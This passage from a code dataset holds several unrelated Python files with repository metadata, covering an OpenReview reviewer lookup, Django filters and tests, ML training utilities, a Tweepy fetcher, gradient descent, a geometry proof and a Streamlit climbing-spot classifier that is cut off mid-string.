sys\nimport csv\nimport openreview\nimport re\n\n'''\nRequirements:\n\nopenreview-py\n\nUsage:\n\nUse the --paper (-p) flag to specify the paper number.\nUse the --reviewer (-r) flag to specify a username or email address to get assignments.\n\npython get-reviewers.py --paper 123\n\npython get-reviewers.py --reviewer ~Oriol_Vinyals1\n\n'''\n\nif __name__ == \"__main__\":\n ## Argument handling\n parser = argparse.ArgumentParser()\n parser.add_argument('-p','--paper')\n parser.add_argument('-r','--reviewer')\n parser.add_argument('--baseurl', help=\"base url\")\n parser.add_argument('--username')\n parser.add_argument('--password')\n\n args = parser.parse_args()\n\n client = openreview.Client(baseurl=args.baseurl, username=args.username, password=args.password)\n\n paper_number = args.paper\n reviewer_name = args.reviewer\n\n conference = 'ICLR.cc/2020/Conference'\n\n if paper_number:\n paper_url = 'ICLR.cc/2020/Conference/Paper{}'.format(paper_number)\n reviewer_group = client.get_group(id=paper_url + '/Reviewers')\n anon_reviewers_groups = client.get_groups(regex=paper_url+'/AnonReviewer.*')\n print('Reviewers for paper {paper_number}:'.format(paper_number=paper_number))\n for reviewer in reviewer_group.members:\n anon_reviewers = [g for g in anon_reviewers_groups if reviewer in g.members]\n if anon_reviewers:\n anon_reviewer = anon_reviewers[0]\n print('{reviewer} - (AnonReviewer{number})'.format(reviewer=reviewer, number=anon_reviewer.id[-1]))\n else:\n print('AnonReviewer not found for {reviewer}, something wrong is here'.format(reviewer=reviewer))\n\n if reviewer_name:\n reviewer_groups = client.get_groups(member=reviewer_name, regex='ICLR.cc/2020/Conference/Paper.*/Reviewers$')\n anon_reviewers_groups = client.get_groups(member=reviewer_name, regex='ICLR.cc/2020/Conference/Paper.*/AnonReviewer.*$')\n print('Papers assigned to reviewer {reviewer}:'.format(reviewer=reviewer_name))\n for group in reviewer_groups:\n number = [token for token in group.id.split('/') if token.startswith('Paper')][0].replace('Paper', '')\n anon_reviewers = [g for g in anon_reviewers_groups if g.id.startswith('ICLR.cc/2020/Conference/Paper{number}'.format(number=number))]\n if anon_reviewers:\n anon_reviewer = anon_reviewers[0]\n print('Paper {paper_number} - (AnonReviewer{number})'.format(paper_number=number, number=anon_reviewer.id[-1]))\n else:\n print('AnonReviewer not found for {number}, something wrong is here'.format(number=number))\n\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/ICLR.cc/2020/Conference/python/get-reviewers.py","file_name":"get-reviewers.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39381751455","text":"def get_average():\n \"\"\"\n Get average of the values after reading the file\n :return:\n \"\"\"\n with open(\"files/Temp\",'r') as file:\n data=file.readlines()\n values=data[1:]\n values=[float(i) for i in values]\n avg=sum(values)/len(values)\n return avg\n\n\naverage=get_average()\nprint(average)\nprint(get_average.__doc__)\n\n","repo_name":"Ajaythota/pythonProject1","sub_path":"getAvg.py","file_name":"getAvg.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24194942196","text":"import os\nimport json\nfrom typing import AnyStr, List\nimport json\nimport logging\n\n#logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)s %(levelname)s:%(message)s')\n\nlogger = logging.getLogger(__name__)\n\n#cnfig_file = \"C:\\\\Users\\\\002CSC744\\\\PycharmProjects\\\\JARINE_VA\" \\\n# \"\\\\config\\\\memory\\\\grammar\\\\generic_qs.json\"\n\nlogger.info(\">> Initiate & find content from generic_qs.json file. \")\ncnfig_file = \"..\\\\..\\\\config\\\\memory\\\\grammar\\\\generic_qs.json\"\n\n\ndef get_question_details():\n logger.info(\">> Get question details initiated. \")\n f = open(cnfig_file)\n data = json.load(f)\n # print('Data:\\t', data)\n for i in data:\n # print(\"I:\\t\", i)\n q_no = i[\"q_no\"]\n qus_param = i[\"qus\"]\n ans_param = i[\"ans\"]\n # print(f\"Qus:\\t{qus_param}\\nans:\\t{ans_param}\\nq_no:\\t{q_no}\")\n # print(\"Pling\")\n print(f\"Qus:\\t{qus_param}\\nans:\\t{ans_param}\") # \\nq_no:\\t{q_no}\")\n\n logger.info(\">> Return Question Param & Ans Param. \")\n return qus_param, ans_param\n\n\nclass QuestionFind():\n def __init__(self):\n question_details = get_question_details()\n #pass\n\n\nif __name__ == '__main__':\n inst = QuestionFind\n inst()\n","repo_name":"deb991/JARINE_VA","sub_path":"engine/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30299569015","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 19 11:18:16 2022\n\n@author: hagen\n\nHier should be everthing related to the raw netcdf file. In particulare the\ninstances that take the raw and make more out of it\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport sp02.calibration as calib\nimport atmPy.general.measurement_site as atmms\n\nclass SP02RawData(object):\n def __init__(self, dataset, site = None, langley_fit_settings = None):\n assert(False), 'deprecated, this is now in atmPy.radiation.observations.spectral_irradiance'\n self.raw_data = dataset\n if isinstance(site, type(None)):\n assert('site' in dataset.attrs.keys()), 'If site is None, then the dataset has have lat,lon,site, site_name, attributes'\n self.site = atmms.Station(lat= dataset.attrs['site_latitude'], \n lon = dataset.attrs['site_longitude'], \n alt = dataset.attrs['site_elevation'], \n name = dataset.attrs['site_name'], \n abbreviation = dataset.attrs['site'],)\n else:\n self.site = site\n self.langley_fit_settings = langley_fit_settings\n self._sun_position = None\n self._am = None\n self._pm = None\n self._transmission = None\n # self._langleys_am = None\n # self._langleys_pm = None\n # self._langley_fitres_am = None\n # self._langley_fitres_pm = None\n \n @property\n def transmission(self):\n if isinstance(self._transmission, type(None)):\n #### load calibrations\n calibrations = calib.load_calibration_history()\n cal = calibrations[int(self.raw_data.serial_no.values)]\n # use the mean and only the actual channels, other channels are artefacts\n cal = cal.results['mean'].loc[:,self.raw_data.channle_wavelengths.values].sort_index()\n \n #### interpolate and resample calibration (V0s)\n dt = self.raw_data.datetime.to_pandas()\n calib_interp = pd.concat([cal,dt]).drop([0], axis = 1).sort_index().interpolate().reindex(dt.index)\n \n #### correct VOs for earth sun distance see functions above\n calib_interp_secorr = calib_interp.divide(self.sun_position.sun_earth_distance**2, axis = 0)\n \n #### match channels for operation\n channels = self.raw_data.channle_wavelengths.to_pandas()\n raw_data = self.raw_data.raw_data.to_pandas().rename(columns = channels)\n raw_data.columns.name = 'wl'\n \n #### get transmission\n self._transmission = raw_data/calib_interp_secorr\n return self._transmission\n \n @property\n def sun_position(self):\n if isinstance(self._sun_position, type(None)):\n self._sun_position = self.site.get_sun_position(self.raw_data.datetime)\n return self._sun_position\n \n @property\n def am(self):\n if isinstance(self._am, type(None)):\n self._get_langley_from_raw() \n return self._am\n \n @property\n def pm(self):\n if isinstance(self._pm, type(None)):\n self._get_langley_from_raw() \n return self._pm\n \n def tp_get_rdl(self):\n raw_df = self.raw_data.raw_data.to_pandas()\n \n # changing to local time\n raw_df_loc = raw_df.copy()\n index_local = raw_df.index + pd.to_timedelta(self.site.time_zone[1], 'h')\n raw_df_loc.index = index_local\n self.raw_df_loc = raw_df_loc\n \n \n def _get_langley_from_raw(self):\n raw_df = self.raw_data.raw_data.to_pandas()\n \n #### changing to local time\n raw_df_loc = raw_df.copy()\n index_local = raw_df.index + pd.to_timedelta(self.site.time_zone['diff2UTC_of_standard_time'], 'h')\n raw_df_loc.index = index_local\n # self.tp_rdl = raw_df_loc.copy()\n \n ##### getting the one day\n sunpos = self.sun_position.copy()\n start = raw_df_loc.index[0]\n if sunpos.iloc[0].airmass > 0:\n start = pd.to_datetime(f'{start.year}{start.month:02d}{start.day:02d}') + pd.to_timedelta(1,'d')\n end = start + pd.to_timedelta(1, 'd')\n raw_df_loc = raw_df_loc.truncate(start, end)\n\n #### localize and cut day for sunposition\n sunpos.index = index_local\n sunpos = sunpos.truncate(start, end)\n\n #### remove the night\n sunpos[sunpos.airmass < 0] = np.nan\n\n #### get the minimum airmass befor I start cutting it out\n noon = sunpos.airmass.idxmin()\n\n #### normalize to the sun_earth_distance\n raw_df_loc = raw_df_loc.multiply(sunpos.sun_earth_distance**2, axis=0)\n \n # langleys are the natural logarith of the voltage over the AMF ... -> log\n # to avoid warnings and strange values do some cleaning before log\n raw_df_loc[raw_df_loc <= 0] = np.nan\n# self.tp_raw_df = raw_df.copy()\n raw_df_loc = np.log(raw_df_loc) \n \n # keep only what is considered relevant airmasses\n amf_min = 2.2 \n amf_max = 4.7\n sunpos[sunpos.airmass < amf_min] = np.nan\n sunpos[sunpos.airmass > amf_max] = np.nan\n\n sunpos_am = sunpos.copy()\n sunpos_pm = sunpos.copy()\n\n sunpos_am[sunpos.index > noon] = np.nan\n sunpos_pm[sunpos.index < noon] = np.nan\n \n\n langley_am = raw_df_loc.copy()\n langley_pm = raw_df_loc.copy()\n\n self.tp_sp_am = sunpos_am\n self.tp_sp_pm = sunpos_pm\n self.tp_df_am = langley_am[~sunpos_am.airmass.isna()].copy()\n self.tp_df_pm = langley_am[~sunpos_pm.airmass.isna()].copy()\n\n langley_am.index = sunpos_am.airmass\n langley_pm.index = sunpos_pm.airmass\n\n self._am = calib.Langley(self,langley_am[~langley_am.index.isna()], langley_fit_settings = self.langley_fit_settings)\n self._pm = calib.Langley(self,langley_pm[~langley_pm.index.isna()], langley_fit_settings = self.langley_fit_settings)\n return True\n \n ","repo_name":"hagne/sp02","sub_path":"sp02/products/raw_nc.py","file_name":"raw_nc.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27993789951","text":"import re\nfrom copy import deepcopy\n\nfrom django.db import models\nfrom django_filters.constants import EMPTY_VALUES\nfrom django_filters.filters import CharFilter, DateFilter\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django_filters.rest_framework.filterset import FilterSet, FILTER_FOR_DBFIELD_DEFAULTS\n\nfrom core.currency import Currency, CurrencyModelField\nfrom core.models.inouts.pair import Pair, PairModelField\n\n\nclass CurrencyModelFilter(CharFilter):\n field_value_class = Currency\n\n def filter(self, qs, value):\n if value is None:\n return self.get_method(qs)(**{self.field_name: None})\n\n if value in EMPTY_VALUES:\n return qs\n\n if self.field_value_class.exists(value):\n value = self.field_value_class.get(value).id\n else:\n return qs.none()\n\n if self.distinct:\n qs = qs.distinct()\n qs = self.get_method(qs)(**{self.field_name: value})\n return qs\n\n\nclass PairModelFilter(CurrencyModelFilter):\n field_value_class = Pair\n\n\nFILTER_FOR_DBFIELD_DEFAULTS = deepcopy(FILTER_FOR_DBFIELD_DEFAULTS)\nFILTER_FOR_DBFIELD_DEFAULTS.update({\n CurrencyModelField: {'filter_class': CurrencyModelFilter},\n PairModelField: {'filter_class': PairModelFilter},\n models.DateTimeField: {'filter_class': DateFilter},\n models.DateField: {'filter_class': DateFilter},\n})\n\n\ndef reparse_query_data(query_data):\n res = {}\n for param, value in query_data.items():\n if '[' and ']' in param:\n new_param_name = param.split('[')[0]\n regex = re.compile('%s\\[([\\w\\d_]+)\\]' % new_param_name)\n match = regex.match(param)\n inner_key = match.group(1)\n if inner_key == 'start':\n res[new_param_name+'__gte'] = value\n elif inner_key == 'end':\n res[new_param_name + '__lte'] = value\n else:\n res[param] = value\n return res\n\n\nclass GenericFilterset(FilterSet):\n FILTER_DEFAULTS = FILTER_FOR_DBFIELD_DEFAULTS\n\n def __init__(self, *args, **kwargs):\n super(GenericFilterset, self).__init__(*args, **kwargs)\n self.data = reparse_query_data(self.data)\n \n def filter_queryset(self, queryset):\n # dirty hack\n data = dict(self.data)\n for name, value in self.form.cleaned_data.items():\n if name in data and name == 'id':\n value = data[name]\n if isinstance(value, list) and len(value) > 1:\n lookup = f'{name}__in'\n queryset = queryset.filter(**{lookup: value})\n else:\n if isinstance(value, list):\n value = value[0]\n queryset = self.filters[name].filter(queryset, value)\n\n else:\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n\nclass GenericAllFieldsFilter(DjangoFilterBackend):\n filterset_base = GenericFilterset\n\n def get_filterset_class(self, view, queryset=None):\n \"\"\"\n Return the `FilterSet` class used to filter the queryset.\n \"\"\"\n defined_filterset_fields = getattr(view, 'filterset_fields', None)\n filterset_fields = {}\n model_fields = {f.name: f for f in queryset.model._meta.fields}\n for field_name in defined_filterset_fields:\n if field_name in model_fields and type(model_fields[field_name]) in [models.DateField, models.DateTimeField]:\n lookups = ['gte', 'lte',]\n else:\n lookups = ['exact']\n filterset_fields[field_name] = lookups\n\n if defined_filterset_fields and queryset is not None:\n MetaBase = getattr(self.filterset_base, 'Meta', object)\n\n class AutoFilterSet(self.filterset_base):\n class Meta(MetaBase):\n model = queryset.model\n fields = filterset_fields\n\n return AutoFilterSet\n\n return None","repo_name":"Polygant/OpenCEX-backend","sub_path":"admin_rest/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24789741711","text":"\"\"\"Utils for training.\"\"\"\n\nfrom typing import Any, Dict, Optional, Tuple\n\nfrom flax.core import frozen_dict\nimport ml_collections\nfrom scenic.train_lib_deprecated.train_utils import TrainState\n\n\ndef get_average_batch_size(config: ml_collections.ConfigDict):\n \"\"\"Computes average batch size.\"\"\"\n\n if config.get('batch_size') is not None:\n return config.batch_size\n\n batch_sizes_sum = 0\n n_datasets = 0\n\n for bs in config.batch_sizes.values():\n batch_sizes_sum += bs\n n_datasets += 1\n\n average_batch_size = int(batch_sizes_sum // n_datasets)\n\n return average_batch_size\n\n\ndef get_num_training_steps_multi(\n config: ml_collections.ConfigDict,\n datasets_metadata: Dict[str, Dict[str, Any]]) -> Tuple[int, Optional[int]]:\n \"\"\"Calculates the total number of training step and possibly steps_per_epoch.\n\n The main training loop is based on number of training steps. Thus, for\n datasets\n that we want to train based on number of epochs, we need to calculate the\n total number of training steps. This function looks for `num_training_steps`\n in config, if it exists it returns that as the total step and `None` as\n `steps_per_epoch`. If num_training_steps doesn't exist, then it looks for\n `num_training_epochs` and given the size of training data calculates the total\n steps and steps_per_epoch. In this computation, we assume that\n drop_remainder=True.\n\n Args:\n config: Configuration of the experiment.\n datasets_metadata: Meta-data that is generated by the dataset_builder.\n\n Returns:\n total_steps: Total number of training steps.\n steps_per_epoch: Number of steps in every epoch.\n \"\"\"\n num_total_train_examples = 0\n for ds_metadata in datasets_metadata.values():\n num_total_train_examples += ds_metadata.get('num_train_examples', 0)\n\n # We either use num_training_epochs or num_training_steps.\n steps_per_epoch = num_total_train_examples // get_average_batch_size(config)\n\n if config.get('num_training_steps'):\n assert not config.get('num_training_epochs')\n return config.num_training_steps, steps_per_epoch or None\n else:\n assert config.num_training_epochs and not config.get('num_training_steps')\n return (steps_per_epoch * config.num_training_epochs), steps_per_epoch\n\n\ndef pop_axes_names(\n train_state: TrainState,\n axes_name: str = 'param_axes') -> Tuple[TrainState, Optional[Any]]:\n \"\"\"Removes axes_names from model_state for a train state.\n\n Args:\n train_state: Training state.\n axes_name: the string specifying the name in the model_state\n\n Returns:\n New train state without axes_names in model_state, axes_names metadata if it\n was removed (so it can be re-added).\n \"\"\"\n model_state = train_state.model_state\n if axes_name in train_state.model_state:\n model_state, param_axes = frozen_dict.freeze(model_state).pop(axes_name)\n return train_state.replace(model_state=model_state), param_axes\n else:\n return train_state, None\n\n\ndef re_add_axis_names(train_state: TrainState,\n param_axes: Any,\n axes_name: str = 'param_axes') -> TrainState:\n \"\"\"Adds axes_names to model_state for a train state.\n\n Args:\n train_state: Training state.\n param_axes: Model axes metadata to re-add.\n axes_name: the string specifying the name in the model_state\n\n Returns:\n New train state without axes_names in model_state, axes_names metadata if it\n was removed (so it can be re-added).\n \"\"\"\n if param_axes:\n model_state = frozen_dict.unfreeze(train_state.model_state)\n model_state[axes_name] = param_axes\n return train_state.replace(model_state=frozen_dict.freeze(model_state))\n else:\n return train_state\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/vid2seq/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"} +{"seq_id":"9796803442","text":"import datetime\nimport tweepy\n\nauth = tweepy.OAuthHandler(\"consumer_key\", \"consumer_secret\")\nauth.set_access_token(\"access_token\", \"access_token_secret\")\n\napi = tweepy.API(auth)\nusername = 'TimesNow'\nstartDate = datetime.datetime(2020, 6, 24, 2, 0, 0)\nendDate = datetime.datetime(2020, 6, 24, 2, 30, 0)\ntweets = []\ntmpTweets = api.user_timeline(username)\n\nwhile (tmpTweets[-1].created_at > startDate):\n print(\"Last Tweet @\", tmpTweets[-1].created_at, \" - fetching some more\")\n tmpTweets = api.user_timeline(username, max_id = tmpTweets[-1].id)\n for tweet in tmpTweets:\n if tweet.created_at < endDate and tweet.created_at > startDate:\n tweets.append(tweet)\n\nprint(\"\\nTweets of: {} \".format(username).upper())\nprint(\"\\n\")\n\n\ncount = 0\nfor user in tweets[:3]:\n count = count + 1\n print(\"Tweet {} \".format(count))\n print(\"ID: {}\".format(user.id))\n print(\"Date Time: {}\".format(user.created_at))\n print(user.text)\n print(\"\\n\")\n\n\n\n","repo_name":"Sayali1993/Central_Repository","sub_path":"Twitter_Assignment6.py","file_name":"Twitter_Assignment6.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31895554090","text":"\"\"\"\r\nLet the parallelogram $ABCD.$ Let $CE\\perp BC,\\ AE \\perp AB.$ Shown that\r\n$ED \\perp AC.$\r\n\"\"\"\r\n\r\n\r\nimport sympy as smp\r\nfrom geom2D import *\r\nxA,yA,xB,yB,xC,yC=smp.symbols('xA,yA,xB,yB,xC,yC',real=True)\r\n\r\n# ----------------------------------------------------------------------------\r\nA=smp.Point(xA,yA)\r\nB=smp.Point(xB,yB)\r\nC=smp.Point(xC,yC)\r\nl1=smp.Line(A,B)\r\nl2=smp.Line(B,C)\r\nl3=parallelLine(C,l1)\r\nl4=parallelLine(A,l2)\r\nD0=smp.intersection(l3,l4);D=D0[0]\r\nE0=smp.intersection(l2.perpendicular_line(C),l1.perpendicular_line(A));E=E0[0]\r\n# ----------------------------------------------------------------------------\r\nrez=smp.Line(A,C).is_perpendicular(smp.Line(D,E))\r\nprint('The lines are perpendicular : '+str(rez))\r\n\r\nimport objPltLibrary as opl\r\nimport matplotlib.pyplot as plt\r\n\r\nxA=0;yA=0\r\nxB=4;yB=0\r\nxC=5;yC=2\r\n# ----------------------------------------------------------------------------\r\nA=smp.Point(xA,yA)\r\nB=smp.Point(xB,yB)\r\nC=smp.Point(xC,yC)\r\nl1=smp.Line(A,B)\r\nl2=smp.Line(B,C)\r\nl3=parallelLine(C,l1)\r\nl4=parallelLine(A,l2)\r\nD0=smp.intersection(l3,l4);D=D0[0]\r\nE0=smp.intersection(l2.perpendicular_line(C),l1.perpendicular_line(A));E=E0[0]\r\n# ----------------------------------------------------------------------------\r\n\r\nobj = opl.plotObj(\r\n fig_height=10,\r\n fig_width=10,\r\n xMin=-2,\r\n xMax=8,\r\n yMin=-2,\r\n yMax=8,\r\n title='Prob10p9'\r\n)\r\n\r\nobj.pltPoint(xA,yA,label='A')\r\nobj.pltPoint(xB,yB,label='B')\r\nobj.pltPoint(xC,yC,label='C')\r\nxD=D.x;yD=D.y\r\nxE=E.x;yE=E.y\r\nobj.pltPoint(xD,yD,label='D')\r\nobj.pltPoint(xE,yE,label='E')\r\nx=[xA,xB,xC,xD,xA]\r\ny=[yA,yB,yC,yD,yA]\r\nlabel=['','','','']\r\nobj.pltPolygonalLine(x,y,label)\r\n\r\nobj.pltLine(xD,yD,xE,yE,label='p',color='blue')\r\nobj.pltSegment(xA,yA,xC,yC,label='q',color='red')\r\n\r\nplt.show()\r\n","repo_name":"e-scheiber/sympy_geometry","sub_path":"Problems/prob10p9.py","file_name":"prob10p9.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5174476905","text":"'''General implementation of gradient descent algorithm.\n\nMore of a learning exercise for myself.\n'''\n\nimport warnings\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.optimize import line_search\nfrom scipy.optimize.linesearch import LineSearchWarning\n\ndef gd(f, grad, x0, alpha=None, maxiter=1e6, tol=1e-8):\n '''Gradient descent algorithm.\n\n Parameters\n ==========\n f : callable\n Function to be optimized.\n grad : callable\n Function that computes the gradient of f.\n x0 : array_like\n Initial point to start to start descent.\n alpha : callable or float, optional\n Either a fixed step size or a function that returns step size.\n maxiter : int, optional\n Do not exceed this number of iterations.\n tol : float, optional\n Run until change in norm of gradient is within this number.\n\n Returns\n =======\n cur_x : array_like\n Estimate of optimal choice of x.\n int\n Number of iterations.\n '''\n\n if not isinstance(x0, np.ndarray):\n x0 = np.atleast_1d(x0).astype(float)\n\n # Use scipy.optimize.line_search by default\n if alpha is None:\n alpha = line_search\n elif not callable(alpha):\n # If stepsize is constant, package it in a constant function\n alpha0 = alpha\n def alpha(*args, **kwargs): # pylint: disable=E0102,W0613\n return(alpha0, 0, 0, None, None, None)\n\n # Set up everything we need for the loop\n cur_x = x0.copy()\n previous_step_size = np.inf\n alpha0_default = 0.5\n alpha0_backup = alpha0_default\n f_vals = [None, None]\n\n # Do the thing!\n pbar = tqdm(total=100, desc='GD %s' % f.__name__, leave=False)\n for ii in range(int(maxiter)):\n\n prev_x = cur_x.copy()\n\n # Compute the search direction\n g0 = grad(f, prev_x)\n s0 = -g0\n\n # Get step size\n # Sometimes line_search doesn't converge - silently ignore this\n with warnings.catch_warnings():\n warnings.filterwarnings('error', category=LineSearchWarning)\n try:\n alpha0, _fc, _gc, f_vals[0], f_vals[1], _derphi_star = alpha(\n f, lambda x: grad(f, x), prev_x, s0, g0,\n f_vals[0], f_vals[1])\n # print('Working!')\n alpha0_backup = alpha0_default\n except LineSearchWarning:\n tqdm.write('Broke')\n alpha0 = alpha0_backup\n alpha0_backup /= 2\n\n # Take care of objective cycling\n f_vals[1] = f_vals[0]\n f_vals[0] = None\n\n # Take the step\n cur_x += alpha0*s0\n\n # Figure out if we can end\n # previous_step_size = np.abs(cur_x - prev_x)\n previous_step_size = np.linalg.norm(grad(f, cur_x))\n pbar.n = 0\n val = np.clip(np.round(\n 100*tol/np.max(previous_step_size + np.finfo(float).eps)), 0, 100)\n pbar.update(val)\n\n if np.all(previous_step_size < tol):\n break\n\n if np.any(previous_step_size > tol):\n warnings.warn('GD hit maxiters! Change in step size is not < %g' % tol)\n\n # return the solution\n return(cur_x, ii+1)\n\nif __name__ == '__main__':\n pass\n","repo_name":"mckib2/mr_utils","sub_path":"mr_utils/optimization/gd.py","file_name":"gd.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"16458494286","text":"from django.test import TestCase\nfrom analysis.enum import TaskStatus\nfrom analysis.models import NetworkAnalysisReports, TaskReports\nfrom analysis.analysis_models.static_analysis import StaticAnalysisReports\nfrom analysis.analysis_models.dynamic_analysis import DynamicAnalysisReports\n\nfrom django.db.utils import IntegrityError\n\n\nclass TaskReportsTestCase(TestCase):\n databases = {\"elfen\"}\n\n @classmethod\n def setUpTestData(cls):\n cls.static_analysis_reports = StaticAnalysisReports.objects.create()\n cls.dynamic_analysis_reports = DynamicAnalysisReports.objects.create()\n cls.network_analysis_reports = NetworkAnalysisReports.objects.create()\n TaskReports.objects.create(\n static_reports=cls.static_analysis_reports,\n dynamic_reports=cls.dynamic_analysis_reports,\n network_reports=cls.network_analysis_reports\n )\n\n def test_taskreports_get(self):\n \"\"\"\n This test checks if TaskReports object can be retrieved. There should\n be only 1.\n \"\"\"\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 1)\n\n def test_taskreports_update(self):\n \"\"\"\n This test updates an existing TaskReports object. It changes the status.\n \"\"\"\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 1)\n\n taskreport = objs[0]\n taskreport.status = TaskStatus.COMPLETE\n taskreport.save()\n\n obj = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )[0]\n self.assertEqual(obj.status, TaskStatus.COMPLETE)\n\n def test_taskreports_delete(self):\n \"\"\"\n This test checks if an existing TaskReports object can be deleted.\n It should be, since *currently* there are no other db objects\n referencing this TaskReports object.\n \"\"\"\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 1)\n\n taskreport = objs[0]\n taskreport.delete()\n\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 0)\n\n def test_taskreports_foreignkey_staticreports_cannot_delete(self):\n \"\"\"\n This test checks if the StaticAnalysisReports object referenced by the\n TaskReports object can be deleted. It should not be, since there is a\n foreign key constraint with on_delete=models.PROTECT.\n \"\"\"\n try:\n self.static_analysis_reports.delete()\n self.fail(\"StaticAnalysisReports object deleted in database\")\n except IntegrityError:\n pass\n\n def test_taskreports_foreignkey_dynamicreports_cannot_delete(self):\n \"\"\"\n This test checks if the DynamicAnalysisReports object referenced by the\n TaskReports object can be deleted. It should not be, since there is a\n foreign key constraint with on_delete=models.PROTECT.\n \"\"\"\n try:\n self.dynamic_analysis_reports.delete()\n self.fail(\"DynamicAnalysisReports object deleted in database\")\n except IntegrityError:\n pass\n\n def test_taskreports_foreignkey_networkreports_cannot_delete(self):\n \"\"\"\n This test checks if the NetworkAnalysisReports object referenced by the\n TaskReports object can be deleted. It should not be, since there is a\n foreign key constraint with on_delete=models.PROTECT.\n \"\"\"\n try:\n self.network_analysis_reports.delete()\n self.fail(\"NetworkAnalysisReports object deleted in database\")\n except IntegrityError:\n pass\n","repo_name":"nikhilh-20/ELFEN","sub_path":"tests/database/test_taskreports.py","file_name":"test_taskreports.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"37"} +{"seq_id":"18489758922","text":"import time\nimport os\nimport pathlib, platform\nimport pprint as pp\nimport shutil\nfrom io import BytesIO\nfrom os.path import basename, join\nimport timm\n\nfrom natsort import natsorted\nimport skimage\nimport streamlit as st\nfrom fastai.vision.all import PILImage, load_learner, Image, platform, requests\nimport timm\nfrom natsort import natsorted\nfrom skimage import io\nfrom skimage.transform import resize\n\nif platform.system() == \"Windows\":\n print(\"on Windows OS - adjusting PosixPath\")\n temp = pathlib.PosixPath\n pathlib.PosixPath = pathlib.WindowsPath\n\n\ndef load_best_model():\n try:\n path_to_archive = r\"model-resnetv2_50x1_bigtransfer_u.zip\"\n best_model_name = \"model-resnetv2_50x1_bigtransfer.pkl\"\n shutil.unpack_archive(path_to_archive)\n best_model = load_learner(join(os.getcwd(), best_model_name), cpu=True)\n except:\n st.write(\"unable to load locally. downloading model file\")\n model_b_best = \"https://www.dropbox.com/scl/fi/kfgvaam338d7qfyc4y0mr/model-resnetv2_50x1_bigtransfer.pkl?dl=1\"\n best_model_response = requests.get(model_b_best)\n best_model = load_learner(BytesIO(best_model_response.content), cpu=True)\n\n return best_model\n\n\ndef load_mixnet_model():\n try:\n path_to_model = r\"model-mixnetXL-20epoch_u.pil\"\n model = load_learner(path_to_model, cpu=True)\n except:\n st.write(\"unable to load locally. downloading model file\")\n model_backup = (\n \"https://www.dropbox.com/scl/fi/48ez7tzm1q7h4o5njn0q8/model-mixnetXL-20epoch.pkl?dl=1\"\n )\n model_response = requests.get(model_backup)\n model = load_learner(BytesIO(model_response.content), cpu=True)\n\n return model\n\n\nsupplemental_dir = os.path.join(os.getcwd(), \"info\")\nfp_header = os.path.join(supplemental_dir, \"climb_area_examples.png\")\n\nst.title(\"GeoGrip: A satellite rock climbing spot detection app\")\nst.markdown(\n \"by Piyush Mohapatra | [GitHub](https://github.com/piyush-mk)\"\n)\n\nst.markdown(\n \"and Kunal\"\n)\n\n\nwith st.beta_container():\n st.markdown(\n \"*Welcome to our app that evaluates satellite or aerial images of the selected terrain and \"\n \"and determines its suitability for outdoor bouldering.*\"\n )\nst.markdown(\"---\")\nst.markdown(\"**Examples of Images in the *climb area* class**\")\nst.image(skimage.io.imread(fp_header))\nst.markdown(\"---\")\nwith st.beta_container():\n st.subheader(\"Test sattelite images\")\n st.markdown(\n \"The following images were not used for model training\"\n )\n\n\n@st.cache\ndef load_image(image_file):\n img = Image.open(image_file)\n return img\n\n\ndef predict(img, img_flex, use_best_model=False):\n st.image(img, caption=\"Image chosen to analyze\", use_column_width=True)\n\n if use_best_model:\n model_pred = load_best_model()\n else:\n model_pred = load_mixnet_model()\n\n with st.spinner(\"model inference running...\"):\n time.sleep(3)\n if not isinstance(img_flex, str):\n fancy_class = PILImage(img_flex)\n model_pred.precompute = False\n pred_class, pred_items, pred_prob = model_pred.predict(fancy_class)\n else:\n pred_class, pred_items, pred_prob = model_pred.predict(img_flex)\n prob_np = pred_prob.numpy()\n\n if str(pred_class) == \"climb_area\":\n st.balloons()\n st.subheader(\n \"Area in test image is good for climbing! {}% confident.\".format(\n round(100 * prob_np[0], 2)\n )\n )\n else:\n st.subheader(\n \"Area in test image not great for climbing :/ - {}% confident.\".format(\n 100 - round(100 * prob_np[0], 2)\n )\n )\n\n\nwant_adv = st.checkbox(\"Use Advanced model (slower)\")\nif want_adv:\n st.markdown(\"*analyzing with advanced 